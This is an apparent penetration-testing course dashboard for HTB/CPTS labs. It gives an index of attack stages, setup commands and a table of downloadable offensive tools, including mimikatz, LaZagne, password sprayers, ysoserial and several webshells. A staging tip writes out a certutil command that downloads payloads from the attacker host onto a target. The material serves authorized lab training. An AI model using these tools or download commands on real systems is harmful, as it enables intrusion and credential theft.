attack-flow-dashboard.md (28605B)
1 --- 2 title: "HTB Pentest Attack Flow — Dashboard" 3 description: "The complete CPTS attack-flow index, stage map, decision points, and offline toolkit entry point." 4 category: pentest-workflow 5 subcategory: "CPTS Attack Flow" 6 order: 0 7 tags: ["htb", "cpts", "penetration-testing", "attack-flow", "pentest-workflow"] 8 tools: ["NetExec", "Impacket", "BloodHound CE", "Certipy", "GhostPack"] 9 difficulty: intermediate 10 updated: "2026-08-29" 11 source: "vault:Pentest Attack Flow/00 - Attack Flow Dashboard.md" 12 --- 13 # HTB Pentest Attack Flow 14 15 > [!dashboard] Workspace 16 > **Playbook:** [HTB Attack Flow Playbook](/sheets/pentest-workflow/htb-attack-flow-playbook) 17 > 18 > **Vault:** Cybersecurity MOC 19 > 20 > **Purpose:** Move from scope and reconnaissance through exploitation, post-exploitation, evidence handling, and reporting. 21 22 > [!warning] Authorized targets only 23 > Use these commands only inside an engagement or lab where you have explicit permission. Record scope, timestamps, commands, and evidence as you work. 24 25 ## Quick Setup 26 27 > [!tip] Set the engagement context once 28 > Keep target details in the shell environment so commands remain readable and accidental target mix-ups are less likely. 29 30 ```bash 31 export IP="10.10.10.10" # primary target host 32 export TARGET="target.htb" 33 export DOMAIN="inlanefreight.local" 34 export DC="dc01.$DOMAIN" # DC FQDN 35 export DCIP="10.10.10.5" # DC IP — most impacket/nxc flags want -dc-ip $DCIP 36 export LHOST="10.10.14.2" 37 export U="username" 38 export P="password" 39 export NT="" # NT hash, when you have one: -hashes :$NT 40 ``` 41 42 ```bash 43 printf '%s\t%s %s\n' "$IP" "$TARGET" "$DC" | sudo tee -a /etc/hosts 44 printf '%s\t%s\n' "$DCIP" "$DC" | sudo tee -a /etc/hosts 45 ``` 46 47 > [!tip] Wordlists — set once, reuse everywhere 48 > ```bash 49 > export ROCKYOU="/usr/share/wordlists/rockyou.txt" 50 > export SECLISTS="/usr/share/SecLists" 51 > # common pulls: 52 > # $SECLISTS/Discovery/Web-Content/raft-medium-directories.txt 53 > # $SECLISTS/Usernames/xato-net-10-million-usernames.txt 54 > # $SECLISTS/Passwords/Leaked-Databases/rockyou.txt 55 > ``` 56 > On a fresh attack box: `sudo apt install seclists wordlists && sudo gunzip /usr/share/wordlists/rockyou.txt.gz`. Repo: [SecLists](https://github.com/danielmiessler/SecLists). 57 58 > [!note] Keep the clock synchronized 59 > Kerberos is time-sensitive (max ~5 min skew, `KRB_AP_ERR_SKEW`). If authentication fails unexpectedly, compare your clock with the domain controller before changing attack paths. 60 > ```bash 61 > nmap -p 88 --script clock-skew -Pn $DCIP # measure the skew 62 > sudo ntpdate $DCIP # hard-sync (or: sudo timedatectl set-ntp off first) 63 > faketime -f '+7h30m' getTGT.py "$DOMAIN/$U:$P" -dc-ip $DCIP # or wrap just the one tool 64 > ``` 65 > Prefer [faketime](https://github.com/wolfcw/libfaketime) per-command over touching the system clock; `htpdate` works when only HTTP(S) egress exists. Deep dive: [Stage 05 — Kerberos Attacks](/sheets/pentest-workflow/kerberos-attacks). 66 67 > [!tools] Modern toolchain (2026) — legacy → current 68 > | Legacy | Use instead | Why | 69 > |---|---|---| 70 > | [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec) (`cme`) | [NetExec](https://github.com/Pennyw0rth/NetExec) (`nxc`) | cme is unmaintained; nxc is the drop-in successor (`nxc smb/ldap/winrm/mssql`). | 71 > | BloodHound Legacy + SharpHound 4 | [BloodHound CE](https://github.com/SpecterOps/BloodHound) + [bloodhound-ce-python](https://github.com/dirkjanm/BloodHound.py) / [RustHound-CE](https://github.com/g0h4n/RustHound-CE) | CE (Postgres, new edge model) is what HTB/CPTS material assumes now; legacy ingestors break against it. | 72 > | ADCS by hand | [Certipy](https://github.com/ly4k/Certipy) (`certipy-ad find -vulnerable`) + on-host [Certify.exe](/downloads/pentest-workflow/Certify.exe) ([SHA-256](/downloads/pentest-workflow/Certify.exe.sha256) · [GPG signature](/downloads/pentest-workflow/Certify.exe.sha256.asc)) | One command maps ESC1–ESC16 instead of manual template audit. | 73 > | On-host Kerberos by hand | [Rubeus.exe](/downloads/pentest-workflow/Rubeus.exe) ([SHA-256](/downloads/pentest-workflow/Rubeus.exe.sha256) · [GPG signature](/downloads/pentest-workflow/Rubeus.exe.sha256.asc)) | Roast, asktgt/asktgs, delegation abuse, ticket injection from Windows. | 74 > | Manual ACL edits | [bloodyAD](https://github.com/CravateRouge/bloodyAD) / impacket `dacledit.py`, `owneredit.py`, `rbcd.py` | Reversible, scriptable ACE changes. | 75 > 76 > Everything in the right column above (and more) ships **offline** in this vault — see the toolkit table below. 77 78 ## Kill Chain 79 80 <figure class="flow plate corners"> 81 <figcaption class="flow__cap"><span class="flow__kind">CPTS kill chain</span><span class="flow__dir">LR</span></figcaption> 82 <div class="flow__body"> 83 <div class="flow__diagram" data-dir="lr"> 84 <div class="flow-rank"><div class="flow-node is-entry">00 Passive Recon</div></div> 85 <div class="flow-edge"></div> 86 <div class="flow-rank"><div class="flow-node">01 Host Discovery</div></div> 87 <div class="flow-edge"></div> 88 <div class="flow-rank"><div class="flow-node">02 Web Enumeration</div></div> 89 <div class="flow-edge"></div> 90 <div class="flow-rank"><div class="flow-node">Foothold Toolkits</div></div> 91 <div class="flow-edge"></div> 92 <div class="flow-rank"><div class="flow-node">03 Service Enumeration</div></div> 93 <div class="flow-edge"></div> 94 <div class="flow-rank"><div class="flow-node">04 AD Enumeration</div></div> 95 <div class="flow-edge"></div> 96 <div class="flow-rank"><div class="flow-node">05 Kerberos Attacks</div></div> 97 <div class="flow-edge"></div> 98 <div class="flow-rank"><div class="flow-node">06 ACL and Object Abuse</div></div> 99 <div class="flow-edge"></div> 100 <div class="flow-rank"><div class="flow-node">07 ADCS Abuse</div></div> 101 <div class="flow-edge"></div> 102 <div class="flow-rank"><div class="flow-node">08 Credential Attacks</div></div> 103 <div class="flow-edge"></div> 104 <div class="flow-rank"><div class="flow-node">09 Privilege Escalation</div></div> 105 <div class="flow-edge"></div> 106 <div class="flow-rank"><div class="flow-node">10 Lateral Movement and Pivoting</div></div> 107 <div class="flow-edge"></div> 108 <div class="flow-rank"><div class="flow-node">Trusts and Cross-Forest</div></div> 109 <div class="flow-edge"></div> 110 <div class="flow-rank"><div class="flow-node is-goal">11 Documentation and Reporting</div></div> 111 </div> 112 </div> 113 </figure> 114 115 ## Stage Index 116 117 | # | Stage | Primary outcome | 118 |---:|---|---| 119 | 01 | [Stage 00 — Passive External Recon](/sheets/pentest-workflow/passive-external-recon) | Build an external picture without touching the target. | 120 | 02 | [Stage 01 — Recon and Host Discovery](/sheets/pentest-workflow/recon-and-host-discovery) | Identify live hosts, services, names, and initial priorities. | 121 | 03 | [Stage 02 — Web Enumeration and Exploitation](/sheets/pentest-workflow/web-enumeration-and-exploitation) | Map and test the web attack surface. | 122 | 04 | [Foothold Toolkit — File Transfers](/sheets/pentest-workflow/foothold-file-transfers) | Move tools and evidence using an appropriate channel. | 123 | 05 | [Foothold Toolkit — Shells, Payloads, and Metasploit](/sheets/pentest-workflow/foothold-shells-payloads-metasploit) | Establish and stabilize an authorized foothold. | 124 | 06 | [Stage 03 — Service Enumeration](/sheets/pentest-workflow/service-enumeration) | Deep-enumerate SMB, RPC, LDAP, DNS, and other services. | 125 | 07 | [Stage 04 — Active Directory Enumeration](/sheets/pentest-workflow/active-directory-enumeration) | Build the directory, host, session, and privilege graph. | 126 | 08 | [Stage 05 — Kerberos Attacks](/sheets/pentest-workflow/kerberos-attacks) | Identify and validate Kerberos-specific attack paths. | 127 | 09 | [Stage 06 — ACL and Object Abuse](/sheets/pentest-workflow/acl-and-object-abuse) | Turn delegated rights and object control into escalation paths. | 128 | 10 | [Stage 07 — ADCS and Certificate Abuse](/sheets/pentest-workflow/adcs-and-certificate-abuse) | Enumerate and safely validate certificate attack paths. | 129 | 11 | [Stage 08 — Password Attacks and Credential Hunting](/sheets/pentest-workflow/password-attacks-and-credential-hunting) | Find, validate, and protect credential material. | 130 | 12 | [Stage 09 — Privilege Escalation](/sheets/pentest-workflow/privilege-escalation) | Escalate locally on Linux or Windows with evidence. | 131 | 13 | [Stage 10 — Lateral Movement, Pivoting, and Loot](/sheets/pentest-workflow/lateral-movement-pivoting-and-loot) | Move deliberately, reach segmented assets, and collect evidence. | 132 | 14 | [Domain Trusts and Cross-Forest](/sheets/pentest-workflow/domain-trusts-and-cross-forest) | Extend the graph beyond a single domain. | 133 | 15 | [Stage 11 — Documentation and Reporting](/sheets/pentest-workflow/documentation-and-reporting) | Maintain evidence and turn validated paths into findings. | 134 | 16 | [Appendix — Worked Chains](/sheets/pentest-workflow/worked-chains) | Review end-to-end examples. | 135 | 17 | [Tool Index](/sheets/pentest-workflow/tool-index) | Jump from a tool to its place in the workflow. | 136 137 ## Offline Toolkit (attachments/) 138 139 The `attachments/` folder **ships offline with this vault** — no egress needed on an air-gapped or HTB VPN lab. Verify integrity before staging anything to a target (record: [SHA256SUMS](/downloads/pentest-workflow/SHA256SUMS) ([GPG signature](/downloads/pentest-workflow/SHA256SUMS.asc))): 140 141 ```bash 142 cd attachments && sha256sum -c SHA256SUMS.txt --ignore-missing 143 ``` 144 145 > [!warning] Verify, then stage 146 > Confirm every binary against [SHA256SUMS](/downloads/pentest-workflow/SHA256SUMS) ([GPG signature](/downloads/pentest-workflow/SHA256SUMS.asc)) before use, and expect AV/Defender to flag most of these — stage in a lab, whitelist only in-scope paths, and clean up afterwards ([Stage 11](/sheets/pentest-workflow/documentation-and-reporting)). 147 148 | File | Platform | Purpose | Primary stage | 149 |---|---|---|---| 150 | [Certify.exe](/downloads/pentest-workflow/Certify.exe) ([SHA-256](/downloads/pentest-workflow/Certify.exe.sha256) · [GPG signature](/downloads/pentest-workflow/Certify.exe.sha256.asc)) | Windows | GhostPack Certify — on-host ADCS enumeration/abuse (ESC paths) | [Stage 07](/sheets/pentest-workflow/adcs-and-certificate-abuse) | 151 | [Go365_linux_amd64.tar.gz](/downloads/pentest-workflow/Go365_linux_amd64.tar.gz) ([SHA-256](/downloads/pentest-workflow/Go365_linux_amd64.tar.gz.sha256) · [GPG signature](/downloads/pentest-workflow/Go365_linux_amd64.tar.gz.sha256.asc)) | Linux | Go365 — Office 365 password spraying | [Stage 08](/sheets/pentest-workflow/password-attacks-and-credential-hunting) | 152 | [GodPotato-NET35.exe](/downloads/pentest-workflow/GodPotato-NET35.exe) ([SHA-256](/downloads/pentest-workflow/GodPotato-NET35.exe.sha256) · [GPG signature](/downloads/pentest-workflow/GodPotato-NET35.exe.sha256.asc)) | Windows (.NET 3.5) | SeImpersonate → SYSTEM (works with Spooler disabled) | [Stage 09](/sheets/pentest-workflow/privilege-escalation) | 153 | [GodPotato-NET4.exe](/downloads/pentest-workflow/GodPotato-NET4.exe) ([SHA-256](/downloads/pentest-workflow/GodPotato-NET4.exe.sha256) · [GPG signature](/downloads/pentest-workflow/GodPotato-NET4.exe.sha256.asc)) | Windows (.NET 4.x) | SeImpersonate → SYSTEM (works with Spooler disabled) | [Stage 09](/sheets/pentest-workflow/privilege-escalation) | 154 | [Inveigh.ps1](/downloads/pentest-workflow/Inveigh.ps1) ([SHA-256](/downloads/pentest-workflow/Inveigh.ps1.sha256) · [GPG signature](/downloads/pentest-workflow/Inveigh.ps1.sha256.asc)) | Windows | LLMNR/NBNS/mDNS spoofing + NTLM capture (Windows-side Responder) | [Stage 03](/sheets/pentest-workflow/service-enumeration) | 155 | [JuicyPotato.exe](/downloads/pentest-workflow/JuicyPotato.exe) ([SHA-256](/downloads/pentest-workflow/JuicyPotato.exe.sha256) · [GPG signature](/downloads/pentest-workflow/JuicyPotato.exe.sha256.asc)) | Windows | SeImpersonate privesc (pre-Server 2019 / Win10 1809) | [Stage 09](/sheets/pentest-workflow/privilege-escalation) | 156 | [LaZagne.exe](/downloads/pentest-workflow/LaZagne.exe) ([SHA-256](/downloads/pentest-workflow/LaZagne.exe.sha256) · [GPG signature](/downloads/pentest-workflow/LaZagne.exe.sha256.asc)) | Windows | Local credential looting (browsers, mail, Wi-Fi, etc.) | [Stage 10](/sheets/pentest-workflow/lateral-movement-pivoting-and-loot) | 157 | [MSOLSpray.ps1](/downloads/pentest-workflow/MSOLSpray.ps1) ([SHA-256](/downloads/pentest-workflow/MSOLSpray.ps1.sha256) · [GPG signature](/downloads/pentest-workflow/MSOLSpray.ps1.sha256.asc)) | Windows | Azure AD / O365 password spraying | [Stage 08](/sheets/pentest-workflow/password-attacks-and-credential-hunting) | 158 | [PetitPotam.py](/downloads/pentest-workflow/PetitPotam.py) ([SHA-256](/downloads/pentest-workflow/PetitPotam.py.sha256) · [GPG signature](/downloads/pentest-workflow/PetitPotam.py.sha256.asc)) | Linux | EFS RPC NTLM coercion (ESC8 prerequisite) | [Stage 07](/sheets/pentest-workflow/adcs-and-certificate-abuse) | 159 | [PowerUp.ps1](/downloads/pentest-workflow/PowerUp.ps1) ([SHA-256](/downloads/pentest-workflow/PowerUp.ps1.sha256) · [GPG signature](/downloads/pentest-workflow/PowerUp.ps1.sha256.asc)) | Windows | PowerSploit PowerUp — Windows privesc misconfig checks | [Stage 09](/sheets/pentest-workflow/privilege-escalation) | 160 | [PowerView.ps1](/downloads/pentest-workflow/PowerView.ps1) ([SHA-256](/downloads/pentest-workflow/PowerView.ps1.sha256) · [GPG signature](/downloads/pentest-workflow/PowerView.ps1.sha256.asc)) | Windows | PowerSploit PowerView — AD enumeration | [Stage 04](/sheets/pentest-workflow/active-directory-enumeration) | 161 | [PrintSpoofer64.exe](/downloads/pentest-workflow/PrintSpoofer64.exe) ([SHA-256](/downloads/pentest-workflow/PrintSpoofer64.exe.sha256) · [GPG signature](/downloads/pentest-workflow/PrintSpoofer64.exe.sha256.asc)) | Windows | SeImpersonate → SYSTEM via named pipe (needs Spooler) | [Stage 09](/sheets/pentest-workflow/privilege-escalation) | 162 | [PrivescCheck.ps1](/downloads/pentest-workflow/PrivescCheck.ps1) ([SHA-256](/downloads/pentest-workflow/PrivescCheck.ps1.sha256) · [GPG signature](/downloads/pentest-workflow/PrivescCheck.ps1.sha256.asc)) | Windows | PrivescCheck — PowerShell Windows privesc enumeration | [Stage 09](/sheets/pentest-workflow/privilege-escalation) | 163 | [Rubeus.exe](/downloads/pentest-workflow/Rubeus.exe) ([SHA-256](/downloads/pentest-workflow/Rubeus.exe.sha256) · [GPG signature](/downloads/pentest-workflow/Rubeus.exe.sha256.asc)) | Windows | GhostPack Rubeus — Kerberos abuse (roast, tickets, delegation) | [Stage 05](/sheets/pentest-workflow/kerberos-attacks) | 164 | [SHA256SUMS](/downloads/pentest-workflow/SHA256SUMS) ([GPG signature](/downloads/pentest-workflow/SHA256SUMS.asc)) | Any | Integrity record for every file in `attachments/` | This dashboard | 165 | [Seatbelt.exe](/downloads/pentest-workflow/Seatbelt.exe) ([SHA-256](/downloads/pentest-workflow/Seatbelt.exe.sha256) · [GPG signature](/downloads/pentest-workflow/Seatbelt.exe.sha256.asc)) | Windows | GhostPack Seatbelt — host situational awareness | [Stage 09](/sheets/pentest-workflow/privilege-escalation) | 166 | [SharpDPAPI.exe](/downloads/pentest-workflow/SharpDPAPI.exe) ([SHA-256](/downloads/pentest-workflow/SharpDPAPI.exe.sha256) · [GPG signature](/downloads/pentest-workflow/SharpDPAPI.exe.sha256.asc)) | Windows | GhostPack SharpDPAPI — DPAPI masterkey/blob abuse | [Stage 10](/sheets/pentest-workflow/lateral-movement-pivoting-and-loot) | 167 | [SharpHound.zip](/downloads/pentest-workflow/SharpHound.zip) ([SHA-256](/downloads/pentest-workflow/SharpHound.zip.sha256) · [GPG signature](/downloads/pentest-workflow/SharpHound.zip.sha256.asc)) | Windows | SharpHound collector (exe + ps1) for BloodHound CE | [Stage 04](/sheets/pentest-workflow/active-directory-enumeration) | 168 | [SharpUp.exe](/downloads/pentest-workflow/SharpUp.exe) ([SHA-256](/downloads/pentest-workflow/SharpUp.exe.sha256) · [GPG signature](/downloads/pentest-workflow/SharpUp.exe.sha256.asc)) | Windows | GhostPack SharpUp — privesc misconfig checks (C#) | [Stage 09](/sheets/pentest-workflow/privilege-escalation) | 169 | [SharpView.exe](/downloads/pentest-workflow/SharpView.exe) ([SHA-256](/downloads/pentest-workflow/SharpView.exe.sha256) · [GPG signature](/downloads/pentest-workflow/SharpView.exe.sha256.asc)) | Windows | SharpView — C# port of PowerView | [Stage 04](/sheets/pentest-workflow/active-directory-enumeration) | 170 | [SharpWMI.exe](/downloads/pentest-workflow/SharpWMI.exe) ([SHA-256](/downloads/pentest-workflow/SharpWMI.exe.sha256) · [GPG signature](/downloads/pentest-workflow/SharpWMI.exe.sha256.asc)) | Windows | GhostPack SharpWMI — WMI lateral movement | [Stage 10](/sheets/pentest-workflow/lateral-movement-pivoting-and-loot) | 171 | [Snaffler.exe](/downloads/pentest-workflow/Snaffler.exe) ([SHA-256](/downloads/pentest-workflow/Snaffler.exe.sha256) · [GPG signature](/downloads/pentest-workflow/Snaffler.exe.sha256.asc)) | Windows | Snaffler — hunt creds in domain shares | [Stage 03](/sheets/pentest-workflow/service-enumeration) | 172 | [StandIn_v13_Net35_45.zip](/downloads/pentest-workflow/StandIn_v13_Net35_45.zip) ([SHA-256](/downloads/pentest-workflow/StandIn_v13_Net35_45.zip.sha256) · [GPG signature](/downloads/pentest-workflow/StandIn_v13_Net35_45.zip.sha256.asc)) | Windows | StandIn — AD object/ACE manipulation from Windows | [Stage 06](/sheets/pentest-workflow/acl-and-object-abuse) | 173 | [SweetPotato.exe](/downloads/pentest-workflow/SweetPotato.exe) ([SHA-256](/downloads/pentest-workflow/SweetPotato.exe.sha256) · [GPG signature](/downloads/pentest-workflow/SweetPotato.exe.sha256.asc)) | Windows | Potato combo (PrintSpoofer + Rotten + EfsRpc) | [Stage 09](/sheets/pentest-workflow/privilege-escalation) | 174 | [Whisker.exe](/downloads/pentest-workflow/Whisker.exe) ([SHA-256](/downloads/pentest-workflow/Whisker.exe.sha256) · [GPG signature](/downloads/pentest-workflow/Whisker.exe.sha256.asc)) | Windows | Shadow Credentials (msDS-KeyCredentialLink) from Windows | [Stage 06](/sheets/pentest-workflow/acl-and-object-abuse) | 175 | [chisel.exe](/downloads/pentest-workflow/chisel.exe) ([SHA-256](/downloads/pentest-workflow/chisel.exe.sha256) · [GPG signature](/downloads/pentest-workflow/chisel.exe.sha256.asc)) | Windows | chisel — TCP/UDP tunneling over HTTP | [Stage 10](/sheets/pentest-workflow/lateral-movement-pivoting-and-loot) | 176 | [chisel_linux_amd64](/downloads/pentest-workflow/chisel_linux_amd64) ([SHA-256](/downloads/pentest-workflow/chisel_linux_amd64.sha256) · [GPG signature](/downloads/pentest-workflow/chisel_linux_amd64.sha256.asc)) | Linux | chisel — TCP/UDP tunneling over HTTP | [Stage 10](/sheets/pentest-workflow/lateral-movement-pivoting-and-loot) | 177 | [donut_v1.1.zip](/downloads/pentest-workflow/donut_v1.1.zip) ([SHA-256](/downloads/pentest-workflow/donut_v1.1.zip.sha256) · [GPG signature](/downloads/pentest-workflow/donut_v1.1.zip.sha256.asc)) | Cross | donut — PE/DLL/EXE → position-independent shellcode | [Foothold — Shells](/sheets/pentest-workflow/foothold-shells-payloads-metasploit) | 178 | [fscan_windows_x64.exe](/downloads/pentest-workflow/fscan_windows_x64.exe) ([SHA-256](/downloads/pentest-workflow/fscan_windows_x64.exe.sha256) · [GPG signature](/downloads/pentest-workflow/fscan_windows_x64.exe.sha256.asc)) | Windows | fscan — internal all-in-one scanner (ports, services, creds) | [Stage 10](/sheets/pentest-workflow/lateral-movement-pivoting-and-loot) | 179 | [gowitness_linux_amd64](/downloads/pentest-workflow/gowitness_linux_amd64) ([SHA-256](/downloads/pentest-workflow/gowitness_linux_amd64.sha256) · [GPG signature](/downloads/pentest-workflow/gowitness_linux_amd64.sha256.asc)) | Linux | gowitness — bulk web screenshotting | [Stage 02](/sheets/pentest-workflow/web-enumeration-and-exploitation) | 180 | [gowitness_windows_amd64.exe](/downloads/pentest-workflow/gowitness_windows_amd64.exe) ([SHA-256](/downloads/pentest-workflow/gowitness_windows_amd64.exe.sha256) · [GPG signature](/downloads/pentest-workflow/gowitness_windows_amd64.exe.sha256.asc)) | Windows | gowitness — bulk web screenshotting | [Stage 02](/sheets/pentest-workflow/web-enumeration-and-exploitation) | 181 | [jaws-enum.ps1](/downloads/pentest-workflow/jaws-enum.ps1) ([SHA-256](/downloads/pentest-workflow/jaws-enum.ps1.sha256) · [GPG signature](/downloads/pentest-workflow/jaws-enum.ps1.sha256.asc)) | Windows | JAWS — Windows privesc enumeration script | [Stage 09](/sheets/pentest-workflow/privilege-escalation) | 182 | [kerbrute_linux_amd64](/downloads/pentest-workflow/kerbrute_linux_amd64) ([SHA-256](/downloads/pentest-workflow/kerbrute_linux_amd64.sha256) · [GPG signature](/downloads/pentest-workflow/kerbrute_linux_amd64.sha256.asc)) | Linux | kerbrute — Kerberos user enum + spray | [Stage 04](/sheets/pentest-workflow/active-directory-enumeration) | 183 | [kerbrute_windows_amd64.exe](/downloads/pentest-workflow/kerbrute_windows_amd64.exe) ([SHA-256](/downloads/pentest-workflow/kerbrute_windows_amd64.exe.sha256) · [GPG signature](/downloads/pentest-workflow/kerbrute_windows_amd64.exe.sha256.asc)) | Windows | kerbrute — Kerberos user enum + spray | [Stage 04](/sheets/pentest-workflow/active-directory-enumeration) | 184 | [ligolo-ng_agent_linux_amd64.tar.gz](/downloads/pentest-workflow/ligolo-ng_agent_linux_amd64.tar.gz) ([SHA-256](/downloads/pentest-workflow/ligolo-ng_agent_linux_amd64.tar.gz.sha256) · [GPG signature](/downloads/pentest-workflow/ligolo-ng_agent_linux_amd64.tar.gz.sha256.asc)) | Linux | ligolo-ng agent — TUN-based pivoting | [Stage 10](/sheets/pentest-workflow/lateral-movement-pivoting-and-loot) | 185 | [ligolo-ng_agent_windows_amd64.zip](/downloads/pentest-workflow/ligolo-ng_agent_windows_amd64.zip) ([SHA-256](/downloads/pentest-workflow/ligolo-ng_agent_windows_amd64.zip.sha256) · [GPG signature](/downloads/pentest-workflow/ligolo-ng_agent_windows_amd64.zip.sha256.asc)) | Windows | ligolo-ng agent — TUN-based pivoting | [Stage 10](/sheets/pentest-workflow/lateral-movement-pivoting-and-loot) | 186 | [linpeas.sh](/downloads/pentest-workflow/linpeas.sh) ([SHA-256](/downloads/pentest-workflow/linpeas.sh.sha256) · [GPG signature](/downloads/pentest-workflow/linpeas.sh.sha256.asc)) | Linux | LinPEAS — Linux privesc enumeration | [Stage 09](/sheets/pentest-workflow/privilege-escalation) | 187 | [linpeas_linux_amd64](/downloads/pentest-workflow/linpeas_linux_amd64) ([SHA-256](/downloads/pentest-workflow/linpeas_linux_amd64.sha256) · [GPG signature](/downloads/pentest-workflow/linpeas_linux_amd64.sha256.asc)) | Linux | LinPEAS binary build | [Stage 09](/sheets/pentest-workflow/privilege-escalation) | 188 | [mimikatz_trunk.zip](/downloads/pentest-workflow/mimikatz_trunk.zip) ([SHA-256](/downloads/pentest-workflow/mimikatz_trunk.zip.sha256) · [GPG signature](/downloads/pentest-workflow/mimikatz_trunk.zip.sha256.asc)) | Windows | mimikatz — credential extraction, tickets, DCSync | [Stage 10](/sheets/pentest-workflow/lateral-movement-pivoting-and-loot) | 189 | [nc64.exe](/downloads/pentest-workflow/nc64.exe) ([SHA-256](/downloads/pentest-workflow/nc64.exe.sha256) · [GPG signature](/downloads/pentest-workflow/nc64.exe.sha256.asc)) | Windows | netcat for Windows — shells, transfers, listeners | [Foothold — Shells](/sheets/pentest-workflow/foothold-shells-payloads-metasploit) | 190 | [nishang-master.zip](/downloads/pentest-workflow/nishang-master.zip) ([SHA-256](/downloads/pentest-workflow/nishang-master.zip.sha256) · [GPG signature](/downloads/pentest-workflow/nishang-master.zip.sha256.asc)) | Windows | Nishang — offensive PowerShell toolkit | [Foothold — Shells](/sheets/pentest-workflow/foothold-shells-payloads-metasploit) | 191 | [nt-webshell-rosepine.aspx](/downloads/pentest-workflow/nt-webshell-rosepine.aspx) ([SHA-256](/downloads/pentest-workflow/nt-webshell-rosepine.aspx.sha256) · [GPG signature](/downloads/pentest-workflow/nt-webshell-rosepine.aspx.sha256.asc)) | IIS / ASPX | Custom C# ASPX webshell for IIS targets | [Stage 02](/sheets/pentest-workflow/web-enumeration-and-exploitation) | 192 | [pspy32](/downloads/pentest-workflow/pspy32) ([SHA-256](/downloads/pentest-workflow/pspy32.sha256) · [GPG signature](/downloads/pentest-workflow/pspy32.sha256.asc)) | Linux (x86) | pspy — unprivileged process/cron monitor | [Stage 09](/sheets/pentest-workflow/privilege-escalation) | 193 | [pspy64](/downloads/pentest-workflow/pspy64) ([SHA-256](/downloads/pentest-workflow/pspy64.sha256) · [GPG signature](/downloads/pentest-workflow/pspy64.sha256.asc)) | Linux (x64) | pspy — unprivileged process/cron monitor | [Stage 09](/sheets/pentest-workflow/privilege-escalation) | 194 | [rp-shell.asp](/downloads/pentest-workflow/rp-shell.asp) ([SHA-256](/downloads/pentest-workflow/rp-shell.asp.sha256) · [GPG signature](/downloads/pentest-workflow/rp-shell.asp.sha256.asc)) | IIS / ASP | Classic ASP webshell | [Stage 02](/sheets/pentest-workflow/web-enumeration-and-exploitation) | 195 | [rp-shell.jsp](/downloads/pentest-workflow/rp-shell.jsp) ([SHA-256](/downloads/pentest-workflow/rp-shell.jsp.sha256) · [GPG signature](/downloads/pentest-workflow/rp-shell.jsp.sha256.asc)) | Java app servers | JSP webshell (Tomcat, JBoss, etc.) | [Stage 02](/sheets/pentest-workflow/web-enumeration-and-exploitation) | 196 | [rp-shell.php](/downloads/pentest-workflow/rp-shell.php) ([SHA-256](/downloads/pentest-workflow/rp-shell.php.sha256) · [GPG signature](/downloads/pentest-workflow/rp-shell.php.sha256.asc)) | PHP hosts | PHP webshell | [Stage 02](/sheets/pentest-workflow/web-enumeration-and-exploitation) | 197 | [targetedKerberoast.py](/downloads/pentest-workflow/targetedKerberoast.py) ([SHA-256](/downloads/pentest-workflow/targetedKerberoast.py.sha256) · [GPG signature](/downloads/pentest-workflow/targetedKerberoast.py.sha256.asc)) | Linux | Targeted kerberoast — set an SPN on a GenericWrite target | [Stage 06](/sheets/pentest-workflow/acl-and-object-abuse) | 198 | [winPEASany.exe](/downloads/pentest-workflow/winPEASany.exe) ([SHA-256](/downloads/pentest-workflow/winPEASany.exe.sha256) · [GPG signature](/downloads/pentest-workflow/winPEASany.exe.sha256.asc)) | Windows (any arch) | WinPEAS — Windows privesc enumeration | [Stage 09](/sheets/pentest-workflow/privilege-escalation) | 199 | [winPEASx64.exe](/downloads/pentest-workflow/winPEASx64.exe) ([SHA-256](/downloads/pentest-workflow/winPEASx64.exe.sha256) · [GPG signature](/downloads/pentest-workflow/winPEASx64.exe.sha256.asc)) | Windows (x64) | WinPEAS — Windows privesc enumeration | [Stage 09](/sheets/pentest-workflow/privilege-escalation) | 200 | [ysoserial-all.jar](/downloads/pentest-workflow/ysoserial-all.jar) ([SHA-256](/downloads/pentest-workflow/ysoserial-all.jar.sha256) · [GPG signature](/downloads/pentest-workflow/ysoserial-all.jar.sha256.asc)) | Java | ysoserial — Java deserialization payloads | [Stage 02](/sheets/pentest-workflow/web-enumeration-and-exploitation) | 201 | [ysoserial.net_v1.36.zip](/downloads/pentest-workflow/ysoserial.net_v1.36.zip) ([SHA-256](/downloads/pentest-workflow/ysoserial.net_v1.36.zip.sha256) · [GPG signature](/downloads/pentest-workflow/ysoserial.net_v1.36.zip.sha256.asc)) | Windows | ysoserial.net — .NET deserialization payloads | [Stage 02](/sheets/pentest-workflow/web-enumeration-and-exploitation) | 202 203 > [!tip] Where to stage from 204 > Serve the whole folder from your attack box with `python3 -m http.server 8000 --directory attachments` or [updog](https://github.com/sc0tfree/updog), then pull with `certutil -urlcache -split -f http://$LHOST:8000/<file>` or `iwr` — transfer recipes in [Foothold Toolkit — File Transfers](/sheets/pentest-workflow/foothold-file-transfers). 205 206 ## Progress 207 ## Engagement Discipline 208 209 - Work from scope and evidence, not assumptions. 210 - Prefer the least invasive test that proves or disproves a path. 211 - Keep raw output separate from conclusions. 212 - Record credentials as sensitive evidence; do not paste secrets into permanent notes. 213 - Log every material target change and include a rollback step. 214 - Stop and reassess when a command could affect availability or other users. 215 - Every new credential = restart at [Stage 04](/sheets/pentest-workflow/active-directory-enumeration) as that identity (new BloodHound edges). 216 - Reverse every AD object/ACE change you make — see the OPSEC callouts in [Stage 06](/sheets/pentest-workflow/acl-and-object-abuse). 217 218 --- 219 220 > [!navigation] Start the workflow 221 > **Next:** [Stage 00 — Passive External Recon](/sheets/pentest-workflow/passive-external-recon)